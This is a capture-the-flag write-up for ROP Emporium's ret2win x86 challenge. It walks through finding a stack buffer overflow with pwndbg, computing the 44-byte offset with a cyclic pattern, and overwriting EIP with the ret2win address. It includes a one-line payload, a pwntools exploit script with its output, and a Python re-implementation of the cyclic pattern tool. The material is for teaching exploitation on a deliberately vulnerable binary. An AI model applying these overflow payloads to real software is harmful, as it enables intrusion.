Binary Exploitation (Pwn)
This section contains CTF writeups.
ROP Emporium
To download all challenges:
https://ropemporium.com/binary/rop_emporium_all_challenges.zip
Ret2win
When we run the program and enter a long run of "a" characters, it crashes with a segmentation fault:
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ $ ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault
List the binary's functions with info functions:
pwndbg> info functions
All defined functions:
Non-debugging symbols:
0x08048374 _init
0x080483b0 read@plt
0x080483c0 printf@plt
0x080483d0 puts@plt
0x080483e0 system@plt
0x080483f0 __libc_start_main@plt
0x08048400 setvbuf@plt
0x08048410 memset@plt
0x08048420 __gmon_start__@plt
0x08048430 _start
0x08048470 _dl_relocate_static_pie
0x08048480 __x86.get_pc_thunk.bx
0x08048490 deregister_tm_clones
0x080484d0 register_tm_clones
0x08048510 __do_global_dtors_aux
0x08048540 frame_dummy
0x08048546 main
0x080485ad pwnme
0x0804862c ret2win
0x08048660 __libc_csu_init
0x080486c0 __libc_csu_fini
0x080486c4 _fini
Disassemble ret2win:
pwndbg> disassemble ret2win
Dump of assembler code for function ret2win:
0x0804862c <+0>: push ebp
0x0804862d <+1>: mov ebp,esp
0x0804862f <+3>: sub esp,0x8
0x08048632 <+6>: sub esp,0xc
0x08048635 <+9>: push 0x80487f6
0x0804863a <+14>: call 0x80483d0 <puts@plt>
0x0804863f <+19>: add esp,0x10
0x08048642 <+22>: sub esp,0xc
0x08048645 <+25>: push 0x8048813
0x0804864a <+30>: call 0x80483e0 <system@plt>
0x0804864f <+35>: add esp,0x10
0x08048652 <+38>: nop
0x08048653 <+39>: leave
0x08048654 <+40>: ret
ret2win calls system() with the argument "/bin/cat flag.txt", so returning into this function prints the flag.
Generate a pattern with cyclic, run the program and paste the pattern in as input:
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg>
To find the offset, run cyclic -l laaa, where laaa is the 4-byte chunk of the pattern that ends up in EIP at the crash.
Now we know the offset is 44, so the payload will be 44 bytes of padding (A*44) followed by the address of ret2win, the function that runs cat flag.txt.
Check the address of the ret2win function:
pwndbg> p ret2win
$1 = {<text variable, no debug info>} 0x804862c <ret2win>
pwndbg>
Convert that address to little-endian byte order: \x2c\x86\x04\x08
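The two steps above (looking up the offset of laaa in the cyclic pattern, and packing the ret2win address little-endian) can be reproduced without pwndbg. The following is an added example, not code from the writeup or from ROP Emporium: it re-implements the de Bruijn pattern that pwntools' cyclic uses (lowercase alphabet, 4-byte windows, which are pwntools' defaults) and a struct-based packer; the function names de_bruijn, cyclic, cyclic_find and p32 are chosen here to mirror the tool.

```python
import functools
import string
import struct

# Added example: minimal re-implementation of pwndbg's `cyclic` and `cyclic -l`
# (de Bruijn sequence, FKM algorithm) plus little-endian address packing.
# Alphabet and window size n=4 match pwntools' defaults, so the output is the
# same pattern shown in the writeup.


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet=string.ascii_lowercase, n=4):
    """Return the de Bruijn sequence B(k, n) over `alphabet`.

    Every length-n window occurs exactly once, which is why reading 4 bytes
    back out of a crashed register identifies a single position in the input.
    """
    k = len(alphabet)
    a = [0] * k * n
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)


def cyclic(length, n=4):
    """Equivalent of `cyclic <length>`: the first `length` chars of the pattern."""
    seq = de_bruijn(n=n)
    if length > len(seq):
        raise ValueError("requested length exceeds the pattern for this alphabet and n")
    return seq[:length]


def cyclic_find(subseq, n=4):
    """Equivalent of `cyclic -l <subseq>`: offset of an n-char window, or -1."""
    if isinstance(subseq, (bytes, bytearray)):
        subseq = subseq.decode("latin-1")
    if len(subseq) != n:
        raise ValueError("lookup value must be exactly %d characters" % n)
    return de_bruijn(n=n).find(subseq)


def p32(addr):
    """Pack a 32-bit address little-endian, the conversion the writeup does by hand."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print(cyclic(100))
    # The writeup reads 'laaa' out of EIP after the crash; that maps to offset 44.
    print("offset of 'laaa':", cyclic_find("laaa"))
    # Address of ret2win from `p ret2win` in the writeup, packed as bytes.
    print("ret2win little-endian:", p32(0x804862c))
```

Because the pattern is a de Bruijn sequence, cyclic_find is exact rather than a guess: the 4-byte window laaa occurs at exactly one offset, which is what makes the 44 reliable even though the input was 100 bytes long.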
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ $ python -c 'print "A"*44 + "\x2c\x86\x04\x08"' | ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
Segmentation fault
Script with pwntools:
#!/usr/bin/python3
from pwn import *

# Load the binary so pwntools knows its architecture and symbol addresses
elf = context.binary = ELF('./ret2win32', checksec=False)
p = process()

padding = 44  # distance from the start of the buffer to the saved return address
payload = flat(
    asm('nop') * padding,     # filler up to the saved EIP
    elf.symbols['ret2win'],   # overwrite EIP with the address of ret2win()
)
# f = open("payload", "wb")
# f.write(payload)
p.sendlineafter(">", payload)
p.interactive()
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ $ python3 auto_pwn.py
[+] Starting local process '/home/sheinn101/ctf/rop_emporium/ret2win/ret2win32': pid 432041
[*] Switching to interactive mode
Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive
Coming Soon...